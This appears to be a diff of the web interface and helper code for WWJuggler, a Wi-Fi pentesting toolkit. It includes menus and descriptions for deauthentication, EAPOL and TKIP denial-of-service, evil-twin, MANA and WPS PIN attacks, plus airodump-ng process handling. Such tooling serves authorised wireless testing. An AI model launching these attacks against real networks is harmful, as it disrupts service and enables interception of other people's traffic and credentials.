function hide_essid(){
$("#essid1").hide()
$("label[for='essid1']").hide()
$("#essid2").hide()
$("label[for='essid2']").hide()
}
function show_essid(){
$("#essid1").show()
$("label[for='essid1']").show()
$("#essid2").show()
$("label[for='essid2']").show()
}
function hide_bssid(){
$("#bssid").hide()
$("label[for='bssid']").hide()
$("#bssid1").hide()
$("label[for='bssid1']").hide()
$("#bssid2").hide()
$("label[for='bssid2']").hide()
}
function show_bssid(){
$("#bssid1").show()
$("label[for='bssid1']").show()
$("#bssid2").show()
$("label[for='bssid2']").show()
$("#bssid").show()
$("label[for='bssid']").show()
}
function hide_client(){
$("#client1").hide()
$("label[for='client1']").hide()
$("#client2").hide()
$("label[for='client2']").hide()
}
function show_client(){
$("#client1").show()
$("label[for='client1']").show()
$("#client2").show()
$("label[for='client2']").show()
}
function hide_channel(){
$("#channel").hide()
$("label[for='channel']").hide()
}
function show_channel(){
$("#channel").show()
$("label[for='channel']").show()
}
function show_fake_essids(){
$("#fake_essids").show()
$("label[for='fake_essids']").show()
}
function hide_fake_essids(){
$("#fake_essids").hide()
$("label[for='fake_essids']").hide()
}
function show_stealth(){
$("#stealth").show()
}
function hide_stealth(){
$("#stealth").hide()
}
function show_loud(){
$("#loud").show()
}
function hide_loud(){
$("#loud").hide()
}
function hide_known_beacons(){
$("#known_beacons").hide()
$("label[for='known_beacons']").hide()
}
function show_known_beacons(){
$("#known_beacons").show()
$("label[for='known_beacons']").show()
}
function hide_mac_whitelist(){
$("#mac_whitelist").hide()
$("label[for='mac_whitelist']").hide()
}
function show_mac_whitelist(){
$("#mac_whitelist").show()
$("label[for='mac_whitelist']").show()
}
function hide_mac_blacklist(){
$("#mac_blacklist").hide()
$("label[for='mac_blacklist']").hide()
}
function show_mac_blacklist(){
$("#mac_blacklist").show()
$("label[for='mac_blacklist']").show()
}
function hide_essid_whitelist(){
$("#essid_whitelist").hide()
$("label[for='essid_whitelist']").hide()
}
function show_essid_whitelist(){
$("#essid_whitelist").show()
$("label[for='essid_whitelist']").show()
}
function hide_essid_blacklist(){
$("#essid_blacklist").hide()
$("label[for='essid_blacklist']").hide()
}
function show_essid_blacklist(){
$("#essid_blacklist").show()
$("label[for='essid_blacklist']").show()
}
var options_msgs = {
"deauth_aireplay": "Deauthenticate a single client (sending a packet specifically for the client), clients inside an AP or clients of a ESSID (sending broadcast deuthentication packets). More info in <a href='https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks#deauthentication-packets'> https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks#deauthentication-packets </a>",
"deauth_mdk4": "Deauthenticate a single client, clients inside an AP or clients of a ESSID by discovering clients connected and sending deauthentication/disassociation packets to them. Stealth mode make match all Sequence Numbersand not send broadcast deauthentication packets. More info in <a href='https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks#disassociation-packets'> https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks#disassociation-packets </a>",
"WIDS_confusion": "Confuse/Abuse Intrusion Detection and Prevention Systems by cross-connecting clients to multiple WDS nodes or fake rogue APs. If no stealth then it launch Zero_Chaos' WIDS exploit (authenticates clients from a WDS to foreign APs to make WIDS go nuts). More info in <a href='https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks#more-dos-attacks-by-mdk4'> https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks#more-dos-attacks-by-mdk4 </a>",
"fake_aps": "Sends beacon frames to show fake APs at clients. This can sometimes crash network scanners and even drivers. If no stealth, then it uses also non-printable caracters in generated SSIDs and create SSIDs that break the 32-byte limit. More info in <a href='https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks#more-dos-attacks-by-mdk4'> https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks#more-dos-attacks-by-mdk4 </a>",
"reinject_data": "Sends authentication frames to all APs found in range. Too many clients can freeze or reset several APs. If stealth, then this test connects clients to the AP and reinjects sniffed data to keep them alive. More info in <a href='https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks#more-dos-attacks-by-mdk4'> https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks#more-dos-attacks-by-mdk4 </a>",
"EAPOL_DoS": "Floods an AP with EAPOL Start frames to keep it busy with fake sessions and thus disables it to handle any legitimate clients. Or logs off clients by injecting fake EAPOL Logoff messages. If stealth, use Logoff messages to kick clients. More info in <a href='https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks#more-dos-attacks-by-mdk4'> https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks#more-dos-attacks-by-mdk4 </a>",
"TKIP_DoS": "Sends random packets or re-injects duplicates on another QoS queue to provoke Michael Countermeasures on TKIP APs. AP will then shutdown for a whole minute, making this an effective DoS. If stealth, Use the new QoS exploit which only needs to reinject a few packets instead of the random packet injection, which is unreliable but works without QoS. More info in <a href='https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks#more-dos-attacks-by-mdk4'> https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks#more-dos-attacks-by-mdk4 </a>",
"evil_twin": "Create a fake access point. You decide the authentication method, the name and the BSSID. More info in <a href='https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks#evil-twin'> https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks#evil-twin </a>",
"mana": "Find the PNL of the devices and create fake APs with that ESSIDS. Select the authentication method. More info in <a href='https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks#karma-mana-loud-mana-and-known-beacons-attack'> https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks#karma-mana-loud-mana-and-known-beacons-attack </a>",
"airodump": "Capture handshakes in the indicated channel using airodump-ng.",
"nullpin": "Some really bad implementations allowed the Null PIN to connect (very weird also). Reaver can test this (Bully cannot).",
"pixiedust": "Try to find if the randomization is weak"
}
window.onload = hide_fields

File diff suppressed because one or more lines are too long

@ -1,50 +0,0 @@
{% extends 'bootstrap/base.html' %}
{% block title %}
{% if title %}{{ title }} - WWJuggler{% else %}Welcome to WWJuggler{% endif %}
{% endblock %}
{% block styles %}
<link rel="stylesheet" href="{{url_for('static', filename='bootstrap.min.css')}}">
{% endblock %}
{% block navbar %}
<script type=text/javascript src="{{ url_for('static', filename='jquery.js') }}"></script>
<nav class="navbar navbar-default">
<div class="container">
<div class="navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="navbar-brand" href="{{ url_for('index') }}">WWJuggler</a>
</div>
<div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1">
<ul class="nav navbar-nav">
<li><a href="{{ url_for('console') }}">Console</a></li>
<li><a href="{{ url_for('dos') }}">DoS</a></li>
<li><a href="{{ url_for('client') }}">Twin/MANA</a></li>
<li><a href="{{ url_for('create_cert') }}">EAP Cert</a></li>
<li><a href="{{ url_for('wps_cracking') }}">WPS</a></li>
<li><a href="{{ url_for('capture_handshake') }}">Cap-HShakes</a></li>
<li><a href="{{ url_for('execute') }}">Exec</a></li>
</div>
</div>
</nav>
{% endblock %}
{% block content %}
<div class="container">
{% with messages = get_flashed_messages() %}
{% if messages %}
{% for message in messages %}
<div class="alert alert-info" role="alert">{{ message }}</div>
{% endfor %}
{% endif %}
{% endwith %}
{# application content needs to be provided in the app_content block #}
{% block app_content %}{% endblock %}
</div>
{% endblock %}

@ -1,17 +0,0 @@
{% extends "base.html" %}
{% block app_content %}
{% if not procs %}
<h2> Nothing is being executed yet.</h2>
{% else %}
<h2>Current Processes <a href="/killall" style="color:red;">[Kill All]</a></h2>
{% for p in procs %}
<pre style="border: 1px solid; margin: 10px; padding-left:3px; {% if p.terminated == 'Stopped' %} color:green; {% endif %}" >
<h4>{{p.name}} {% if p.terminated == 'Running' %} <a href="/kill/{{p.name}}" style="color:red;">[Kill]</a> {% endif %} ({{p.terminated}})</h4>
{{p.tail}}
</pre>
{% endfor %}
<script>setTimeout(function(){window.location.reload(1);}, 5000);</script>
{% endif %}
{% endblock %}

@ -1,19 +0,0 @@
{% extends "base.html" %}
{% import 'bootstrap/wtf.html' as wtf %}
{% block app_content %}
<h1>{{ formtype }}</h1>
<div class="alert alert-secondary" role="alert"><h4>Information about the attack</h4><p id="option_msg"></p></div>
<p><i>Notice that ESSID2, BSSID2 and Client2 have priority over ESSID1, BSSID1 and Client1</i></p>
<div class="row">
<div class="col-md-4">
{{ wtf.quick_form(form) }}
</div>
</div>
<br>
{% endblock %}
{% block scripts %}
<script type=text/javascript src="{{ url_for('static', filename='form.js') }}"></script>
{% endblock %}

@ -1,26 +0,0 @@
{% extends "base.html" %}
{% block app_content %}
<div style="margin:20px">
<h3> Available wlan interfaces</h3>
<ul>
{% for wlan, mode in wlans.items() %}
{% if mode == "Managed" %}
<li><h5 style="color:green; font-size:15px">{{ wlan }} ({{ mode }}) <button onclick="window.location.href = '/change_wlan_mode/{{ wlan }}';">Change Mode</button> </h5></li>
{% else %}
<li><h5 style="color:red; font-size:15px">{{ wlan }} ({{ mode }}) <button onclick="window.location.href = '/change_wlan_mode/{{ wlan }}';">Change Mode</button></h5></li>
{% endif %}
{% endfor %}
</ul>
<br>
<form action="/restart_airodump">
<input type="submit" value="Restart airodump" />
</form>
<!--<br>
<form action="/reboot" method="POST" onsubmit="return confirm('Do you really want to reboot the system?');">
<input type="submit"style="color:red;" value="Reboot System" />
</form>
<br>-->
</div>
<iframe src="/scan_results" style="position:fixed; left:0px; right:0px; width:100%; height:75%; border:none; margin:0;"></iframe>
{% endblock %}

@ -1,41 +0,0 @@
{% block content %}
{% if aps|length > 0 %}
<h2>Current APs</h2>
<table>
<tr>
{% for key, value in aps[0].items() %}
<th>{{key}}</th>
{% endfor %}
</tr>
{% for ap in aps %}
<tr>
{% for key, value in ap.items() %}
<th>{{value}}</th>
{% endfor %}
</tr>
{% endfor %}
</table>
<h2>Current Clients</h2>
<table>
<tr>
{% for key, value in clients[0].items() %}
<th>{{key}}</th>
{% endfor %}
</tr>
{% for client in clients %}
<tr>
{% for key, value in client.items() %}
<th>{{value}}</th>
{% endfor %}
</tr>
{% endfor %}
</table>
{% else %}
<h1>Nothing was found (is airodump-ng running?)</h1>
{% endif %}
{% endblock %}
<script>setTimeout(function(){window.location.reload(1);}, 20000);</script>

@ -1,177 +0,0 @@
from subprocess import Popen, PIPE
from time import sleep
import os, signal, glob, datetime
count_ps = 0
executing_procs = {}
wlans_being_used = []
main_iface = ""
current_path = os.path.dirname(os.path.abspath(__file__))
scripts_path = current_path + "/scripts/"
executing_path = current_path + "/executing/"
store_path = os.path.expanduser("~/.wwjuggler/")
current_store_path = store_path + datetime.datetime.now().strftime("%d-%m-%Y_%H:%M")
store_airodump = current_store_path + "/airodump_scan"
#############################
### Wlan ifaces functions ###
#############################
def get_wlan_interfaces():
global main_iface
wlans = {}
up_wlans_interfaces()
procs = get_procs()
for w in os.popen('ip link show | grep -oP "wlan[\da-zA-Z]*"').read().split():
wlans[w] = "Managed" if "Managed" in os.popen("iwconfig "+w+" | grep Mode").read() else "Monitor"
if w == main_iface:
wlans[w] = wlans[w] + "- Main in use"
continue
being_used = True if any( [ p["terminated"] == "Running" for p in procs if (w != main_iface and w in p["name"]) ] ) else False # True is a process using the interface is running
if being_used:
wlans[w] = wlans[w] + "- in use"
return wlans
def up_wlans_interfaces():
for iface in os.popen('ip link show | grep "DOWN" | grep -oP "wlan[\da-zA-Z]*"').read().split():
os.system("ifconfig "+iface+" up")
for iface in os.popen('ip link show | grep "DOWN" | grep -oP "wlan[\da-zA-Z]*"').read().split():
os.system("nmcli device set "+iface+" managed yes")
os.system("ifconfig "+iface+" up")
#############################
###### Clean functions ######
#############################
#def clean_exec_procs_dir():
# fileList = glob.glob(executing_path+'/*.out')
# fileList += glob.glob(executing_path+'/*.err')
# for filePath in fileList:
# try:
# os.remove(filePath)
# except:
# print("Error while deleting file : ", filePath)
def clean_data(data):
not_interesting = ["First time seen", "Last time seen", "Speed", "LAN IP", "ID-length"]
for ni in not_interesting:
data.pop(ni, None)
return data
#############################
## Wifi scanning functions ##
#############################
def get_scan_results():
if not os.path.isfile(store_airodump+'/wwjuggler-airo-01.csv'):
return ([],[])
with open(store_airodump+'/wwjuggler-airo-01.csv','r') as f:
csv_content = f.read().splitlines()
stations = []
stations_header = [val.lstrip() for val in csv_content[1].strip().split(",")]
clients = []
clients_header = []
actual = stations
actual_header = stations_header
is_client = False
for line in csv_content[2:]:
line = line.strip()
if ("Probed ESSIDs") in line:
actual = clients
clients_header = [val.lstrip() for val in line.split(",")]
actual_header = clients_header
is_client = True
continue
actual.append({})
if not is_client:
line_splitted = line.split(",")
else:
line_splitted = line.split(",")[:6]+[",".join(line.split(",")[6:])]
for i, value in enumerate(line_splitted):
actual[-1][actual_header[i]] = value.replace(" ","").lstrip()
actual[-1] = clean_data(actual[-1])
return (stations, clients)
def get_macs_aps_clients():
stations,clients = get_scan_results()
stations_macs = list(set([ b["BSSID"] for b in stations if b["BSSID"]]))
stations_macs.sort()
essids = list(set([ b["ESSID"] for b in stations if "ESSID" in b.keys() and b["ESSID"]]))
essids.sort()
clients_macs = list(set([ c["Station MAC"] for c in clients if c["Station MAC"]]))
clients_macs.sort()
stations_macs.insert(0,"")
essids.insert(0,"")
clients_macs.insert(0,"")
return stations_macs, essids, clients_macs
def restart_airo():
global main_iface
#Stop airodump
for pid in os.popen("pgrep -f '/wwjuggler-airo'").read().splitlines():
print("Kill airodump pid "+str(pid))
os.kill(int(pid), signal.SIGTERM)
#Delete previous airodumps
fileList = glob.glob(store_airodump+'/wwjuggler-airo*')
for filePath in fileList:
try:
os.remove(filePath)
except:
print("Error while deleting file : ", filePath)
#Start airodump
wlans = get_wlan_interfaces()
if len(wlans) > 0:
iface = list(wlans.keys())[0]
main_iface = iface
cmd = "airodump-ng --wps -w "+store_airodump+"/wwjuggler-airo --output-format csv --background 1 " + main_iface
print("Executing airodump: "+cmd)
Popen(cmd.split(" "))
sleep(5)
else:
print("NO WLAN INTERFACE DETECTED!!!")
#############################
#Process management functions
#############################
def get_procs():
global executing_procs
files_executing = list(filter(os.path.isfile, glob.glob(current_store_path + "/*")))
files_executing.sort(key=lambda x: os.path.getmtime(x))
files_executing.reverse()
procs = []
for f in files_executing:
f_err = f.replace(".out",".err")
if ".out" in f:
if int(os.path.getsize(f)) >= int(os.path.getsize(f_err)):
procs.append({"name": f.split("/")[-1], "terminated": "Stopped" if not (executing_procs[f.split("/")[-1]].poll() is None) else "Running", "tail": os.popen('tail -n 20 ' + f).read()})
else:
procs.append({"name": f_err.split("/")[-1], "terminated": "Stopped" if not (executing_procs[f.split("/")[-1]].poll() is None) else "Running", "tail": os.popen('tail -n 20 ' + f_err).read()})
return procs
#############################
###### Other functions ######
#############################
def my_execute(cmd, outfile, errfile, shell=False):
global executing_procs, count_ps
print("Executing: "+str(cmd))
with open(outfile, "wb") as out, open(errfile, "wb") as err:
proc = Popen(cmd, stdout=out, stderr=err, stdin=PIPE, shell=shell, preexec_fn=os.setsid)
executing_procs[outfile.split("/")[-1]] = proc
count_ps += 1